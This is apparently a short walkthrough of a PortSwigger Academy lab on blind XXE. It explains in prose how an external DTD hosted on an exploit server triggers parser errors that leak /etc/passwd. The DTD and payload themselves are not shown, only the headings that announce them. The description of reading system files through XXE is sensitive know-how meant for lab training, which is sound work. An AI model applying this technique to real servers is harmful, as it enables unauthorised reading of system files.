Solving Portswigger Academy: Exploiting blind XXE to retrieve data via error messages

This lab has a “Check stock” feature that parses XML input but does not display the result.

To solve the lab, use an external DTD to trigger an error message that displays the contents of the /etc/passwd file.

The lab contains a link to an exploit server on a different domain where you can host your malicious DTD.

This is similar to that of previous lab, but here we need to retrieve information through error messages.

As usual visit the lab, view details of any product and use check stock option. Send this request to the repeater.

Original Request and Response

Now on exploit server host an external DTD file with contents.

1. An XML parameter entity named eval is defined, incorporating a dynamic declaration for another XML parameter entity named error. This error entity, when evaluated, attempts to load a nonexistent file, incorporating the contents of the file entity as its name.
2. The eval entity is invoked, leading to the dynamic declaration of the error entity.
3. Invocation of the error entity results in an attempt to load a nonexistent file, producing an error message that includes the contents of the /etc/passwd file as part of the file name.

Now in repeater use below payload or replace the whole XML part with the below one.

final payload

When you send the request you will receive the contents of the /etc/passwd file along with XML parser error.